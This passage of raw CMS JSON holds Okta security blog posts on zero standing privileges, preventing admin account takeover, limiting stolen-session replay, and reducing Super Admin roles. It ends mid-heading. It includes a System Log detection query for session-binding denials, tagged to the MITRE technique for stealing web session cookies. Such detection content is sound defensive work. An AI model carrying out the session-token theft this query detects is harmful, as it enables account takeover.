auditing.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"However, we want zero standing privileges to be a design pattern in reach for even the smallest of Okta’s customers. Okta is committed to ensuring that every workforce customer can achieve zero standing permissions for access to the functions they require to administer Okta.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta’s product team has subsequently lifted a subset of premium Okta Privileged Access and Identity Governance features and built them directly into the Okta Admin Console to make this essential protection available to all Okta Workforce customers at no cost.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Using this configuration, the journey to zero standing privileges in Okta is simpler again:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"ordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Assign all administrators with custom roles designed for the minimum resources and permissions required to complete day-to-day work;\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Create a Request Approval process for administrators that require temporary (“just-in-time”) elevated permissions for administrative tasks that are performed less often,\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Require dual authorization (approvals) from two or more fellow administrators for access to roles with elevated permissions.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Create an action in the Access Request that adds a user to a group assigned the elevated permissions after authorization and removes them from the group after the specified time period expires.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The only exceptions you might need to make to this process are:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"ordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"A break-glass account with a super administrator role.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Depending on your deployment, you may require an account for emergency access. This “break glass account” needs to be protected by policies that assume your trusted network or PAM solution is not available. We suggest limiting access by network location (using secondary or tertiary IP ranges for redundancy), and also requiring multi factor authentication. A common approach is to require one of several physical FIDO2 security keys enrolled for the account, plus a machine-generated string as a password. Access to this account should be monitored with absolute vigilance: any use should set off alarm bells in the SOC.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Service accounts used in machine-to-machine authentication\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Don’t neglect accounts used for non-human (machine-to-machine) access. Use OAuth 2.0-based \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://developer.okta.com/blog/2023/04/24/api-integrations\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"API Service Applications\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", wherever available, with the least required account permissions and scopes applied. If you are using legacy static API tokens for any integrations, make use of Okta’s \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/security/api.htm#editallowednetworkzones\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"IP allowlisting feature\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\": this ensures that Okta APIs will only accept requests using these tokens from trusted locations. Vault all static API tokens, maintain an inventory of their purpose, and audit and rotate regularly. Once configured, service accounts should be members of an Okta Group, and a global session policy should be applied to that group that denies interactive access (NB: this won’t restrict API access). Maintenance tasks should require a formal access request process that temporarily subjects the account to a different policy. Service accounts should otherwise be closely monitored for detection of unauthorized interactive and/or shared access.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Preventing Account Takeovers\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"As discussed, Okta has built best-in-class features to prevent unauthorized access to the Okta Admin Console. Many of these features are enabled by default.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The resilience of your environment largely depends on sound configuration of policies and supporting controls. At minimum, Okta Security recommends protecting administrative users by configuring the following:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Enable \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/security/threat-insight/ti-index.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"ThreatInsight\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" in log and enforce mode. This will detect and prevent high-volume credential based attacks on any account that still requires a password.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Apply strong authentication policies to groups with administrative permissions.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Require administrative users to sign-in using passwordless, phishing resistant authenticators (Okta FastPass, FIDO2 WebAuthn, Smart Cards).\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Enforce \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/identity-engine/authenticators/phishing-resistant-auth.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"phishing resistance\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" in policy.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Require users to \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/identity-engine/policies/add-app-sign-on-policy-rule.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"verify their identity\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" via a biometric challenge (preferred) or PIN.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Deny the use of \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/blog/2022/09/okta-passkey-management-a-new-feature-flag/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"discoverable FIDO2 credentials\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" (Passkeys) for access to the administrative console and require use of device-bound FIDO2 credentials instead. Passkeys may otherwise be susceptible to theft from unmanaged devices or cloud service accounts.\",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Require access via \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/identity-engine/devices/devices-main.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"trusted, managed devices\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" for administrative access.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Require access via managed browsers (i.e. do not allow administrators to sign-in to personal accounts from the browser).\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Use \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/identity-engine/devices/edr-integration-main.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"endpoint security integrations\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" to deny access to devices exhibiting poor posture.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Deny all requests to administrative apps from anonymizing proxies and other untrusted networks using \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/identity-engine/network/create-dynamic-zone.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Dynamic Network Zones\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Evaluate \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/identity-engine/oie-risk-behavior-eval.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"user behavior and risk\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" in policy, and alert on anomalous authentication requests (such as new device + new IP).\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Apply an explicit, catch-all deny rule for any access to the Okta Admin Console that doesn’t meet the above conditions.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Reducing the Blast Radius of a Stolen Session\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Irrespective of the strength of your protective controls, your threat model must also account for the theft and replay of an administrator’s session token using malware or other means.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta’s revised default session duration for the Admin Console is designed to limit the opportunities for adversaries to exploit a stolen session token.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"ASN Session Binding, which is enabled for all Okta orgs by default, limits the ability to replay a stolen session outside of an expected context. Security teams can optionally insist on enforcing IP Session Binding for the Okta Admin Console, which binds all requests during an administrative session to the same IP used during authentication. IP Session Binding is on by default for all new Okta orgs.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We also recommend the following:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Enable Protected Actions in the Okta Admin Console. This forces step-up authentication before an administrative user can modify critical settings, such as enabling a third-party Identity Provider or resetting all factors of an administrative user, greatly reducing what actions an adversary can perform with a stolen session token.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Configure a Re-authentication Frequency of “Every Sign-In Attempt” to all administrative applications. This greatly diminishes access to applications using a stolen user session.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Choose FastPass as your primary authenticator. FastPass provides a fast, consistent user experience on all OS/browser platforms, prevents and detects real-time AiTM phishing campaigns, and offers an ability to constrain credentials to approved devices. It can also play a role in mitigating the theft of session tokens: FastPass can be configured to evaluate device signals on managed and unmanaged devices prior to allowing access. Okta can subsequently use these device signals to assess device context every time a user requests a new application during a session, and require re-authentication if device context is assessed to have changed.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Finally, it’s important to audit the use of administrative roles and to monitor for suspicious administrative activity. As we’ve said in \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/leastprivilege\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"previous posts\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", the monitoring and oversight of actions performed by users with administrative roles is a cornerstone of any well-designed security program.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We recommend the use of \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en-us/content/topics/reports/log-streaming/about-log-streams.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Log Streaming\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" for the fastest access to Okta System Log events in the SIEM of your choice. You can find a sample of common detections we have published in collaboration with \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/shareddetections\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Splunk\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" and \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/articles/2023/08/telling-more-okta-detection-stories-google-chronicle\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Google Chronicle\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"A new event relevant to organizations that have deployed ASN and IP Session binding is provided below.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"table\",\"data\":{},\"content\":[{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Event\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"System Log Query\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"User Denied Access due to ASN/IP Session Binding (\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://attack.mitre.org/techniques/T1539/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"T1539\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\")\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"eventType eq \\\"security.session.detect_client_roaming\\\"\",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta’s engineering teams have worked tirelessly over the last 90 days to provide the guardrails and additional features required to protect access to administrative functions in Okta.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Over 9000 Okta orgs adopted ASN Session Binding within three months of its release, giving us the confidence to turn the feature on for all Workforce customers by default. Over 95% of Workforce orgs have maintained the default maximum and idle session duration configuration we switched on for all customers in January.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We remain committed to prioritizing the features that protect privileged users under the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/secure-identity-commitment/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Secure Identity Commitment\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}"},"summary":null,"updatedAt":"2025-02-10T00:11:42.720Z","secAuthor":[{"id":"e0099522-136e-5003-b6a5-f4499896bf19","bio":{"bio":"Brett Winterford is Vice President of Okta Threat Intelligence. Okta Threat Intelligence delivers timely, highly relevant and actionable insights about the threat environment, with a focus on identity-based threats. Brett was previously the regional Chief Security Officer for Okta in the Asia Pacific and Japan, and advised business and technology leaders in the region on all things identity. Prior to Okta, Brett held a senior security leadership role at Symantec, and helmed security research, awareness and education at Commonwealth Bank. Brett is also an award-winning journalist, editor-in-chief of iTnews Australia and a contributor to the Risky Business podcast and newsletter, to ZDNet, the Australian Financial Review and the Sydney Morning Herald.
"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/5cVIStynit3itWxHA4pv8S/8e8e647b20b34abcaff72ee837cb797c/Brett_20Resized.jpg"},"name":"Brett Winterford","jobTitle":"VP, Okta Threat Intelligence","slug":"brett-winterford","node_locale":"en"}]},{"slug":"/seven-fewer-super-admins","id":"edf6a374-6b04-532b-8587-d8bfaf6bf15f","title":"Seven Ways to Reduce Super Admins in Okta","date":"2024-09-02T00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Over the past few months, Okta has made considerable progress in our quest to deliver zero standing privileges to administrators of the Okta Platform.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"As we discussed in \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/articles/caseforzerostandingprivileges\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Part 1 of this blog series\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", Zero Standing Privileges takes the concept of “least privilege” access to the nth degree. We aim to deliver an operating model in which no interactive (human) user account has ongoing, permanent access to highly privileged administrative roles or permissions, which are instead granted on a just-in-time, time-bound basis when required. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This model of access dramatically reduces the attack surface for an organization. In the rare circumstance that an attacker gains unauthorized access to a user or service account, their ability to abuse this access is greatly diminished.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Today, the permissions in many administrative accounts tend to exist by inertia: a role was required for a given task at some point in time, but there has been no driver (or governance) in place to pare the permissions back to what the account requires on an ongoing basis. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"As we’ve \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/protectingadminsessions\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"previously written\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", the first step toward zero standing privileges is to identify the use cases your organization has for highly privileged roles. Some use cases, such as break glass accounts, require standing privileges. In other cases, a user performs an administrative task so frequently that it’s impractical to ask them to request permission every time they do it. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"However, if a permission is (a) attractive to an attacker and (b) rarely required and used intermittently, that is an ideal candidate for a custom admin role that is only available on a Just-in-Time (JIT), time-bound basis via Okta’s ability to \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en-us/content/topics/security/governance-admin-roles/govern-admin-roles.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"govern Okta admin roles\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\". (NB: The ability to govern Okta admin roles is a new capability, available to all Okta Workforce customers: talk to your Account Exec if you can’t find it in the console!)\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"As a first step, Okta created \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en-us/content/topics/security/custom-admin-role/about-role-permissions.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"specific permissions\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" for several such tasks or “jobs to be done” so that they can be assigned to a role.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The use of specific permissions to create \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/security/custom-admin-role/custom-admin-roles.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"custom admin roles\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" can dramatically reduce the number of accounts with standing access to highly privileged permissions.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The next step is to use Okta’s governance features to restrict those rarely used and highly privileged permissions to an access request flow. Using these features, an administrative user must request and be approved via dual authorization to perform tasks that require a privileged permission. Once approved, the user can only use the permission for a set period of time before their account reverts to its standing role.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In this post, we’ll cover the first step in the process: identifying permissions that help to reduce the use of the most privileged role in Okta, the Super Administrator role.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"1 - JIT permission to modify an Identity Provider \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The ability to create or modify a third party identity provider fits squarely into the category of a highly-privileged and intermittent administrative task. Until recently, this task required an account with a Super Administrator or Org Administrator role. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"So this task makes an ideal candidate use case for governing Okta admin roles. It’s especially prudent to lock down this permission given \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"adversarial interest\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" in abusing trust relationships for impersonating users in downstream applications. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We recommend creating a custom admin role scoped to the Manage Identity Providers permission (okta.identityProviders.manage) that is available on a JIT basis, subject to approval workflows, and which expires after a few hours.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Further, it’s good practice to turn on \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en-us/content/topics/security/admin-console-protected-actions.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"protected actions\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" to ensure that any Identity Provider lifecycle event (adding or modifying identity providers) will first trigger a step-up authentication challenge.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"2 - JIT permission to modify AD/LDAP Agents\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"After initial setup of an Okta Org, administrators should not need to create or modify new directory agents frequently. If your org has enabled auto-updates for \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en-us/content/topics/directory/agent-auto-update-main.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"AD agents\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" or \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en-us/content/topics/directory/ldap/agent-auto-update-ldap.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"LDAP agents\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", there is limited agent maintenance required via the Okta Admin Console or Management APIs.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Creating or modifying agents has historically required an account with the Super Administrator role.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"You can avoid using Super Administrator by:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Creating a custom admin role scoped to the Manage Agent permission (okta.agents.manage),\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Creating an \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en-us/content/topics/security/governance-admin-roles/ar-admin-roles.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Access Request flow\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" that provides this role on a JIT basis, subject to approval workflows, and which expires after a few hours,\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Assign a group of trusted administrators to request and approve this access.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Important: if you still use Active Directory, you reduce the number of service accounts that use the Super Administrator role (by at least 1!) by simply upgrading to Version 3.18 of the AD Agent. From Version 3.18, the AD Agent uses OAuth 2.0 Demonstrating Proof-of-Possession (DPoP) to communicate with Okta, and is no longer bound to a specific administrative user account.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"3 - JIT permission to modify 